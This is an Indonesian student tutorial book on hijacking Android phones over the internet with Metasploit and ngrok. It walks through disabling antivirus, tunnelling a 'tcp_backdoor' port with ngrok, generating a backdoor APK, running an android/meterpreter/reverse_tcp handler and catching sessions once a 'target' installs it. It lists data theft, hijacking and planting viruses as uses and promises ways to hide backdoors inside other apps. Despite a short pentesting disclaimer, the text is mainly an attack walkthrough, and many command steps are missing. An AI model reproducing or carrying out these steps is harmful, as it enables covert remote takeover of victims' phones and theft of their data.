OLEH :
WIDIANTO EKA SAPUTRO
LEMBAR KESEPAKATAN
PEMBUATAN BUKU TUTORIAL
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 1
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 2
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
LEMBAR PENGESAHAN
Menyetujui,
Mengetahui,
Koordinator Kerja Praktek,
BUKU TUTORIAL | 3
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
KATA PENGANTAR
Puji syukur kami panjatkan ke hadirat Tuhan Yang Maha Esa karena atas rahmat dan
karunia-Nya kami bisa menyelesaikan buku Tutorial ini untuk project KP (Kerja Praktek). Buku
ini dibuat dengan mempertimbangkan perkembangan dari mahasiswa , yang dikhususkan untuk
membantu ajar atau penunjang materi di perkuliahan. Selain itu, buku ini kami konsep untuk
kemandirian mahasiswa dalam melakukan latihan dalam mempelajari materi perkuliahan.
Kesuksesan belajar berawal dari kemauan dan ditunjang oleh berbagai sarana, salah satu
diantaranya adalah buku. Harapan kami, buku ini dapat membantu mahasiswa memahami tentang
tools yang akan dipelajari di perkuliahan dan mengenal tools untuk uji penetrasi keamanan pada
smartphone. Diharapkan setelah membaca buku ini , pembaca bisa lebih mengerti tentang resiko
dan kemanan pada smartphone Adroid.
Akhir kata kami mengucapkan terima kasih kepada semua pihak yang telah membantu
dalam membuat buku ini. Kritik dan saran sangat kami harapkan untuk perbaikan buku ini di
masa yang akan datang.
Selamat Belajar
Hormat Saya
BUKU TUTORIAL | 4
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
DAFTAR ISI
LEMBAR KESEPAKATAN
LEMBAR PENGESAHAN
KATA PENGANTAR
DAFTAR ISI
1....................................................................................................................................................... 8
2..................................................................................................................................................... 10
TERMINOLOGI ....................................................................................................................... 15
3..................................................................................................................................................... 27
BUKU TUTORIAL | 5
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
4..................................................................................................................................................... 32
5..................................................................................................................................................... 37
6..................................................................................................................................................... 43
7..................................................................................................................................................... 48
BUKU TUTORIAL | 6
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
8..................................................................................................................................................... 59
9..................................................................................................................................................... 71
10................................................................................................................................................... 77
11................................................................................................................................................... 82
BUKU TUTORIAL | 7
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
1
PENGANTAR PENETRATION TESTING
1. Langkah pertama yang dilakukan pada Pentest adalah perencanaan. Pada tahapan ini harus
dibicarakan ruang lingkup dan juga ketentuan dari penetetration testing yang akan
dilakukan.
2. Langkah berikutnya adalah information gathering dan analysis. Pada tahapan ini
dikumpulkan semua informasi tentang sistem target.
3. Langkah selanjutnya adalah vulnerability detection (pencarian celah keamanan). Setelah
mengetahui informasi tentang sistem, pencarian celah keamanan bisa dilakukan manual
atau secara automatis dengan tool tertentu.
4. Setelah menemukan celah keamanan, maka langkah berikutnya adalah percobaan
penyerangan (penetration attempt). Pada proses ini dilakukan penentuan target, pemilihan
tools dan exploit yang tepat. Umumnya diperlukan juga kemampuan password cracking.
BUKU TUTORIAL | 8
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Cara lain yang dapat dilakukan adalah dengan melakukan social engineering dan pengujian
physical security dari sistem.
5. Tahap berikutnya adalah analisis dan pembuatan laporan. Disini biasanya dilaporkan
tentang langkah kerja yang dilakukan, celah keamanan yang ditemukan serta usulan
perbaikan. Tahapan selanjutnya biasanya tindak lanjut, yang biasanya harus dilakukan
bersama-sama dengan admin untuk memperbaiki sistem.
Pada buku ini , kita akan melakukan suatu serangan kepada seseorang / sekelompok orang
, tentunya jika kita asal melakukan penyerangan , hal tersebut tergolong tindakan kejahatan. Maka
dari itu pada buku ini kita dikenalkan terlebih dahulu dengan istilah “Penetration Testing” dimana
pada Penetratioin Testing kita bisa melakukan simulasi serangan dengan tujuan untuk mengetahui
kelemahan suatu sistem. Nantinya seseorang/sekelompok orang tersebut akan kita arahkan agar
bisa menanggulangi serangan dan memperkuat tingkat kemanan pada sistem yang mereka
gunakan.
BUKU TUTORIAL | 9
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
2
PENGENALAN METASPLOIT
TENTANG METASPLOIT
Metasploit adalah sebuah proyek keamanan komputer yang dapat menyediakan informasi
tentang kerentanan keamanan dan membantu dalam pengujian penetrasi dan pengembangan
signature IDS. Metasploit memiliki beberapa sub proyek. Metasloit merupakan software security
yang sering digunakan untuk menguji cob tahanan suatu sistem dengan cara mengeksploitasi
kelemahan software suatu sistem.
The Metasploit Project adalah proyek yang dikembangkan oleh Rapid7, proyek ini
mengembangkan sistem yang menyediakan informasi kerentanan pada suatu kemanan komputer
dan mengembangkan source code yang memungkinkan suatu jaringan masuk ke jaringan sendiri
untuk mengidentifikasi resiko keamanan pada jaringan tersebut. Metasploit ini juga kadang bisa
BUKU TUTORIAL | 10
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
menjadi software penyerang ke sistem komputer yang mencari kelemahan dalam keamanannya,
dan agar dapat memperoleh akses ke data dan fitir-fitur dari komputer tersebut.
JENIS-JENIS METASPLOIT
a) Metasploit framework
Metasploit framework merupakan sebuah penetration tool yang cukup powerfull
untuk melakukan penetrasi kedalam sebuah system. Metasploit framework bisa juga
dikatakan sebagai sebuah platfrom pengembangan untuk membuat tool security dan
exploit.
Berikut ini adalah langkah dasar untuk mengekploitasi suatu sistem yaitu:
Memeriksa apakah sistem target yang dimaksud rentan terhadap metode exploit yang
dipilih.
Memilih dan mengkonfigurasi exploit (kode yang memasuki sistem target dan
mengambil keuntungan dari salah satu bug)
Memilih metode encoding sehingga intersion-prevention system (IPS) mengabaikan
muatan data yang diencoding
Memilih dan mengkonfigurasi payload (kode yang akan dieksekusi pada sistem target
setelah berhasil masuk).
Melaksanakan exploitasi
BUKU TUTORIAL | 11
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
b) Metasploit Payload
a) Kelebihan Metasploit
Kita bisa melakukan penetrasi untuk komputer lain meskipun itu dari luar LAN kita.
BUKU TUTORIAL | 12
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Tidak perlu mendapatkan akses untuk menggunakan komputer target selama exploit
kita sudah berhasil.
b) Kekurangan Metasploit
METASPLOIT INTERFACE
a) MSFConsole
MSF Console merupakan all in one atau konsol terpusat dan memungkinkan
pengguna lebih efisien karena untuk hampir semua pilihan yang tersedia di metasploit
framework. Seperti toko serba ada untuk semua impian eksploitasi.
Kita dapat menggunakan msfconsole untuk melakukan berbagai hal, termasuk
meluncurkan exploit, memuat modul tambahan, melakukan penghitungan, menciptakan
pendengar(listener) , atau menjalankan eksploitasi massal terhadap seluruh jaringan.
Meskipun Kerangka Metasploit terus berubah, sebagian dari perintah tetap relatif konstan.
Dengan menguasai dasar-dasar msfconsole, Kita akan dapat mengikuti perubahan apa pun.
MSF Console ini adalah interface yang kebanyakan akan kita gunakan dalam
memngikuti tutorial pada buku ini. Namun MSF Console juga mempunyai kelebihan dan
kekurangan tertentu
BUKU TUTORIAL | 13
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
b) MSFCLI
MSFcli merupakan interface yang menggunakan command line untuk
menggunakan metasploit.
Berikut ini adalah kelebihan MSFcli sebagai berikut;
Mendukung peluncuran eksploitasi dan modul tambahan
Dapat menangani tugas tertentu yang lebih spesifik
Baik untuk pembelajaran, karena tidak menggunakan fitur otomatis seperti yang
dimiliki msfconsole
Cocok digunakan untuk pengujian atau mengembangkan eksploitasi yang baru.
Untuk kekurangan MSFcli yaitu tidak mendukung banyak fitur sebaik MSFconsole dan
hanya dapat menangani satu shell dalam satu waktu, sehingga lebih praktis untuk
menggunakan serangan client-side.
c) Armitage
Armitage merupakan salah satu interfaces Metasploit yang sudah menggunakan
grafis (GUI). Armitage ini adalah antarmuka yang dibuat oleh Raphael Mudge. antarmuka
ini sangat mengesankan, kaya fitur, dan tersedia secara gratis. Kami tidak akan membahas
armitage secara mendalam, tetapi jelas layak disebut sebagai sesuatu untuk dijelajahi.
Tujuan kami adalah untuk mengajarkan seluk beluk Metasploit, dan GUI luar biasa begitu
kita memahami bagaimana framework ini sebenarnya beroperasi.
BUKU TUTORIAL | 14
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
TERMINOLOGI
Sepanjang buku ini, kami akan menggunakan berbagai istilah yang pertama kali
memberikan beberapa penjelasan. Mayoritas istilah dasar berikut ini didefinisikan dalam konteks
Metasploit, tetapi mereka umumnya sama di seluruh industri keamanan.
Exploit
Exploit adalah cara yang digunakan penyerang, atau pen tester . dalam mengambil
keuntungan dari cacat dalam suatu sistem, aplikasi, atau layanan. Seorang penyerang
menggunakan exploit untuk menyerang suatu sistem dengan cara menghasilkan sesuatu
yang diinginkan. Eksploitasi yang umum termasuk buffer overflow, kerentanan aplikasi
web (seperti injeksi SQL), dan kesalahan konfigurasi.
Payload
Payload adalah kode yang kita inginkan untuk dieksekusi oleh sistem yang telah
kita pilih yang akan disampaikan oleh Framework.
Shellcode
Module
Modul dalam konteks buku ini adalah perangkat lunak yang dapat digunakan oleh
Framework Metasploit. Terkadang, Kita mungkin memerlukan penggunaan eksploit
module, komponen perangkat lunak yang melakukan serangan. Di waktu lain, sebuah
modul bantu mungkin diperlukan untuk melakukan tindakan seperti pemindaian atau
pencacahan sistem.
BUKU TUTORIAL | 15
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Listener
DOWNLOAD METASPLOIT
Untuk download , terdapat 2 pilihan , yaitu Metasploit Framework dan Metasploit Pro.
Disini kita akan menggunakan metasploit framework. Kita klik download , maka kita akan
diarahkan ke laman github .
BUKU TUTORIAL | 16
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Bisa kita lihat terdapat pilihan operating system disana. Kita bisa memilih sesuai operating
system kita , namun disini saya akan menjelaskan tutorialnya dengan menggunakan sistem operasi
Linux , atau lebih tepatnya Linux Mint.
BUKU TUTORIAL | 17
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
3. Klik Next , maka kita akan diarahkan pada halaman End-User License agreement.
4. Checklist pada “I accept the terms in License Agreement”. Kemudian klik next
BUKU TUTORIAL | 18
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
5. Pilih Folder tempat kita menginstall Metasploit dengan cara klik browse.
6. Disini saya membuatkan folder baru pada local disk C , dengan nama folder MSF, double
klik pada folder tersebut dan klik “OK”
7. Selanjutnya pergi ke antivirus , dan kita buat exlusion untuk folder tempat kita menginstall
metasploit , disini antivirus yang saya gunakan adalah windows defender. Tujuannya
adalah agar file yang ada pada metasploit tidak terkena scan oleh antivirus kita , jadi
metasploit bisa bekerja dengan semestinya.
BUKU TUTORIAL | 19
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 20
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 21
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Berikut adalah cara instalasi metasploit pada linux , cara ini bekerja untuk semua linux yang
berbasis Ubuntu:
1. Download metasploit terlebih dahulu , untuk metasploit yang saya gunakan , bisa didownload
pada halaman berikut :
https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
2. Setelah download , maka pergi ke folder tempat download kita menggunakan terminal dengan
akses root . lalu ketikkan perintah
BUKU TUTORIAL | 22
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
4. Klik Forward , maka akan tampil jendela License Agreement , pilih “I Accept the agreement”
kemudian klik Forward.
5. Selanjutnya pilih folder tempat kita akan menginstall metasploit , disini saya menempatkannya
pada folder “/opt/metasploit”. Setelah itu klik forward.
BUKU TUTORIAL | 23
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
6. Akan muncul jendela yang menyatakan bahwa kita bisa menginstall metasploit sebagai service
, plih “Yes” kemudian klik forward.
7. Selanjutnya akan muncul jendela yang menyatakan bahwa kita diminta untuk mendisable
firewall dan antivirus, klik “Forward”.
8. Selanjutnya akan muncul jendela Metasploit service , disini kita diminta menentukan akan
dijalankan pada port berapa Metasploit service ini. Disini saya isi SSL port dengan port “3790”
kemudian klik Forward.
BUKU TUTORIAL | 24
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
9. Selanjutnya kita akan diarahkan ke jendela Generate Certificate isi sesuai gambar berikut
,kemudian klik Forward.
10. Selanjutnya metasploit sudah siap diinstall , klik Forward. Dan tunggu proses instalasi
metasploit selesai.
BUKU TUTORIAL | 25
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
12. Untuk menjalankan metasploit , kita tinggal membuka terminal dan mengarahkannya ke folder
yang kita tuju tadi “opt/metasploit/app”.
BUKU TUTORIAL | 26
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
3
PENGENALAN NGROK
Ngrok adalah sebuah tool untuk mengekspos server lokal di belakang NAT dan firewall ke
internet publik melalui terowongan yang aman. Dengan Ngrok kita bisa menghubungkan suatu
akses dari internet menuju ke jaringan local kita. Kita memberi informasi tentang pada port berapa
server web kita mlakukan Listen.
BUKU TUTORIAL | 27
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Ngrok bekerja dengan cara kita mengunduh dan menjalankan program di mesin kita dan
menyediakannya dengan port layanan jaringan, biasanya server web. Port tersebut akan terhubung
ke layanan cloud ngrok yang menerima lalu lintas di alamat publik dan menyampaikan lalu lintas
itu ke proses ngrok yang berjalan di mesin kita dan kemudian ke alamat lokal yang kita tentukan.
BUKU TUTORIAL | 28
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Untuk download Ngrok , kita hanya perlu menuju ke halaman downloadnya , yaitu
https://ngrok.com/download . Download sesuai dengan sistem operasi yang kita gunakan . Untuk
langkah instalasinya kita bisa mengikuti langkah instalasi yang disediakan oleh website Ngrok .
Untuk bisa menggunakan Ngrok , kita memerlukan Auth Token , Auth Token ini didapan
ketika kita mendaftarkan akun kita di website Ngrok. Untuk mendaftar di website Ngrok , kita
tinggal menuju ke halaman https://dashboard.ngrok.com/signup . dan mendaftar dengan email kita.
BUKU TUTORIAL | 29
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Setelah mendaftar , kita bisa login ke akun kita. Ketika kita sudah login , kita akan
diarahkan menuju halaman dashboard kita di https://dashboard.ngrok.com/get-started/setup. Pada
halaman itu kita bisa melihat bagaimana proses setting up ngrok dan cara menghubungkan kea kun
Ngrok kita
Sampai disini kita sudah berhasil menginstall Ngrok , dan bisa menggunakan Ngrok. Untuk
pengguna gratisan , kita hanya bisa melisten 1 protokol pada satu waktu , jika ingin lebih , kita
harus upgrade ke premium . Namun tenang saja , nantinya saya akan menjelaskan cara setting agar
Ngrok kita bisa melisten lebih dari 1 protokol walaupun kita pengguna gratisan.
SETTING NGROK
Disini kita akan melakukan beberapa setting sederhana , sehingga Akun Gratis Ngrok kita
yang hanya bisa melakukan 1 tunneling saja , bisa melakukan multiple tunneling , berikut adalah
caranya :
2. Buka file berikut dengan menggunakan text editor kita “leafpad ~/.ngrok2/ngrok.yml” ,
disini saya menggunakan text editor leafpad.
BUKU TUTORIAL | 30
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
3. Jika file sudah dibuka , maka bisa dilihat disana terdapat auth token milik kita. Selanjutnya
kita tambahkan beberapa code sebagai berikut .
tunnels :
http_apache:
proto: http
addr: 80
tcp_ssh:
proto: tcp
addr: 22
tcp_backdoor:
proto: tcp
addr: 4444
4. Setelah ditambahkan , kemudian simpan dan tutup file tersebut , lalu kita coba jalankan
ngrok dengan perintah “./ngrok start -all”. Maka bisa kita lihat Tunneling Ngrok berjalan
lebih dari 1
BUKU TUTORIAL | 31
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
4
PEMBUATAN PAYLOAD BACKDOOR ANDROID
Payload adalah kode yang kita inginkan untuk dieksekusi oleh sistem yang telah kita
targetkan yang akan disampaikan oleh Framework (dalam hal ini Metasploit) kepada kita.
Backdoor adalah perangkat lunak yang digunakan untuk mengakses sistem, aplikasi, atau
jaringan tanpa harus menangani proses autentikasi. Backdoor dapat membantu user yang membuat
BUKU TUTORIAL | 32
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
backdoor (peretas) dapat masuk ke dalam sistem tanpa harus melewati proses autentifikasi.
Backdoor juga dapat diartikan sebagai mekanisme yang digunakan untuk mengakses sistem atau
jaringan.
Awalnya backdoor dibuat para programmer untuk mendapatkan akses khusus untuk masuk
ke dalam program yang mereka kembangkan. Apalagi saat terjadi masalah pada program mereka,
seperti crash maupun masalah yang diakibatkan oleh bug. Pada saat terjadi masalah itu, backdoor
menjadi salah satu solusi yang berhasil dibuat.
Hal – hal yang bisa kita lakukan ketika kita berhasil menyisipkan backdoor pada Payload yang
nantinya kita buat adalah untuk bisa melakukan aktivitas berikut:
Pencurian data
Pembajakan Smartphone Android
Merusak sistem
Menaruh virus pada Smarthone Android
BUKU TUTORIAL | 33
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
1. Untuk membuat payload backdoor , pertama kita jalankan terminal / command prompt lalu
pergi menuju folder “metasploit/app” terlebih dahulu dengan akses root . Jika kalian
menggunakan windows , maka pergi ke folder “metasploit-framework/bin/” jangan lupa ketika
membuka command prompt pastikan untuk “Run as administrator”
Penjelasan :
BUKU TUTORIAL | 34
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
-p : Payload
R : Raw format
-o : Output (hasil eksekusi akan ditempatkan pada direktori mana dan juga nama dan format
file apa)
3. Untuk hasil dari payloadnya kita bisa melihat pada tempat kita menentukan direktori output
dari payload yang kita buat
BUKU TUTORIAL | 35
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Sampai disini kita sudah berhasil membuat payload Backdoor.apk , Ketika target menginstall file
apk yang kita buat , file akan mengeksekusi payload yang berisi backdoor , backdoor tersebut
mempunyai Listen Host dan Listen Port yang nantinya Host dan Port tersebut akan kita Listen
dengan menggunakan metasploit console , sehingga kita bisa mendapatkan akses terhadap
Smartphone Android target.
BUKU TUTORIAL | 36
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
5
PENGGUNAAN METASPLOIT UNTUK MENDAPATKAN
AKSES BACKDOOR MELALUI JARINGAN LOKAL
Setelah sebelumnya kita berhasil membuat payload yang berisikan backdoor , selanjutnya
bagaimana kita mendapatkan akses backdoor tersebut ?. Tentunya pertama kita perlu target agar
menginstall backdoor yang kita buat.
Sebagai contoh saya akan menginstall backdoor yang telah dibuat tadi . Karena Laptop dan
Smartphone Android saya berada pada satu jaringan lokal. Maka saya akan menjelaskan tentang
bagaimana cara mendapatkan akses backdoor yang kita buat pada jaringan lokal.
BUKU TUTORIAL | 37
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Banner yang ditampilkan memang berbeda , karena banner yang disediakan oleh metasploit
diatur secara acak.
BUKU TUTORIAL | 38
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
5. Kita pilih exploit yang kita gunakan dengan cara mengetikkan perintah
use exploit/multi/handler
6. Kemudian kita pilih modul payload yang akan kita gunakan , dengan cara mengetikkan
perintah
7. Selanjutnya set LHOST dan LPORTnya , perlu diketahui karena target kita ada pada jaringan
lokal , maka pastikan ketika pembuatan payload dan ketika eksekusi msfconsole LHOST dan
LPORTnya adalah sama. Untuk set LHOST dan LPORT pada msfconsole ,caranya adalah
dengan mengetikkan perintah sebagai berikut
8. Setelah smuanya selesai , kita tinggal menjalankan perintah “Exploit” maka msfconsole akan
mulai menjalankan reverse_tcp handler , dimana msfconsole akan mulai bersiap menangkap
session Meterpreter pada Lhost dan Lport yang telah kita atur tadi.
BUKU TUTORIAL | 39
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
9. Selanjutnya pastikan target sudah menginstall backdoor yang telah kita buat.
BUKU TUTORIAL | 40
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Pada beberapa Smartphone Android yang tingkat keamanannya sudah cukup tinggi , file
backdoor apk yang kita buat tadi akan dianggap sebagai file tidak aman untuk diinstal , namun
terdapat cara untuk menyisipkan file backdoor kita sehingga file yang kita berikan kepada
target tidak terdeteksi sebagai file tidak aman , caranya akan saya bahas pada point berikutnya
yaitu point “Injecting backdoor payload kedalam aplikas android lain”. Jika mmuncul
pemberitahuan seperti diatas , pilih tetap install.
10. Setelah target menginstall backdoor , pastikan target membuka aplikasi yang berisi backdoor ,
disini karena aplikasi yang kita buat memang backdoor sederhana , maka ketika aplikasi dibuka
, aplikasi tersebut akan tertutup sendiri . Namun itu bukan berarti eror , hanya saja memang
karena aplikasi yang kita buat tidak memiliki tampilan apapun.
11. Setelah target membuka aplikasi , kita bisa melihat respon dari metasploit console , bahwa ada
1 session meterpreter yang tertangkap.
BUKU TUTORIAL | 41
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
12. Sampai tahap ini kita sudah berhasil mengakses backdoor yang kita buat. Kita bisa melakukan
banyak hal tentunya , namun untuk hal hal yang bisa dilakukan akan saya bahas pada point
berikutnya yaitu “Hal yang bisa dilakukan setelah mendapat akses Backdoor”
Sampai pada point ini kita sudah bisa mengerti cara kerja dari metasploit untuk melakukan
peretasan android , namun pada point ini kita hanya bisa melakukannya pada jaringan lokal saja ,
ketika kita dan target berada pada suatu jaringan yang sama , lalu bagaimana jika kita ingin
melakukannya jika target tidak berada pada satu jaringan ? . Hal tersebut akan kita bahas pada
point selanjutnya.
BUKU TUTORIAL | 42
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
6
PENGGUNAAN METASPLOIT DAN NGROK
UNTUK MENDAPATKAN AKSES MELALUI INTERNET
Setelah sebelumnya kita atelah mempelajari bagaimana cara mendapatkan akses backdoor
kita melalui jaringan lokal , sekarang kita akan mempelajari bagaimana mendapatkan akses
backdoor kita melalui jaringan internet (Tidak dalam satu jaringan lokal).
Untuk jaringan lokal , kita hanya memerlukan metasploit saja , namun untuk jaringan
internet , kita akan memerlukan Ngrok , lantas apa fungsi Ngrok disini ?. Ngrok disini digunakan
untuk memforward target yang membuka aplikasi backdoor kita , menuju jaringan lokal kita.
Sehingga kita bisa mendapatkan session meterpreter dengan menggunakan metasploit kita
walaupun kita berada di jaringan yang berbeda dengan IP yang berbeda. Langsung saja kita bahas
step by step untuk melakukannya.
BUKU TUTORIAL | 43
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
1. Pastikan kita sudah mempunyai Metasploit dan Ngrok , jika belum silahkan ikuti langkah
instalasi Metasploit pada point 2 , dan Ngrok pada point 3.
2. Buka Terminal dan jalankan Ngrok dengan cara , cd menuju direktori tempat instalasi Ngrok ,
dan ketikkan perintah.
./ngrok start -all
Pastikan kita sudah melakukan setting Ngrok sesuai langkah yang dijelaskan pada point 3.
3. Perhatikan alamat yang saya block dengan warna biru , alamat tersebut nantinya akan kita
gunakan sebagai LHOST dan LPORT ketika membuat payload. Portnya mungkin berbeda
beda , namun alamatnya sama . Intinya disini kita mengambil host dan port dari protokol tcp
terserah port 22 atau 8080.
4. Buka 1 Terminal lagi , dan arahkan ke direktori tempat kita menginstall metasploit.
5. Buat Payload , dengan menggunakan LHOST dan LPORT yang tadi kita tentukan
BUKU TUTORIAL | 44
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
6. Jika sudah , jalankan MSFconsole ,dengan cara mengetikkan perintah “msfconsole” pada
terminal , dan tunggu sampai msfconsole terbuka.
7. Ketikkan perintah “use exploit/multi/handler” pada msfconsole .
8. Kemudian ketikkan perintah “set PAYLOAD android/meterpreter/reverse_tcp”.
9. Selanjutnya kita set LHOST dan LPORTnya , Untuk LHOST isi dengan 0.0.0.0 dan untuk
LPORT isi dengan 4444 sesuai dengan LPORT pada ngrok tcp.
BUKU TUTORIAL | 45
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
15. Sampai disini kita sudah berhasil mendapatkan session meterpreter , dan kita bisa melakukan
berbagi macam hal . Seperti point sebelumnya , untuk hal yang bisa dilakukan ketika
mendapatkan sesi meterpreter akan kita bahas pada point berikutnya.
BUKU TUTORIAL | 46
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 47
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
7
HAL YANG BISA DILAKUKAN SETELAH MENDAPATKAN
AKSES BACKDOOR
Setelah sebelumnya kita mengetahui cara membuat backdoor dan mendapatkan akses dari
backdoor aplikasi android yang kita buat. Sekarang kita akan mempelajari tentang hal apa saja
yang bisa kita lakukan setelah kita mendapatkan sesi meterpreter .
BUKU TUTORIAL | 48
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Untuk Hal-Hal yang bisa dilakukan sebenarnya kita bisa melihat pada msfconsole setelah
kita berhasil mendapatkan sesi meterpreter dengan cara mengetikkan perintah “help”. maka akan
tampil informasi perintah terkait sesi meterpreter.
Core Command
Perintah Deskripsi
BUKU TUTORIAL | 49
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
irb Membuka ruby shell interaktif pada session yang saat ini sedang
berjalan
Machine _id Mendapatkan MSF ID dari machine yang di sisipkan pada session
BUKU TUTORIAL | 50
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Perintah Deskripsi
cd Mengubah direktori
BUKU TUTORIAL | 51
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
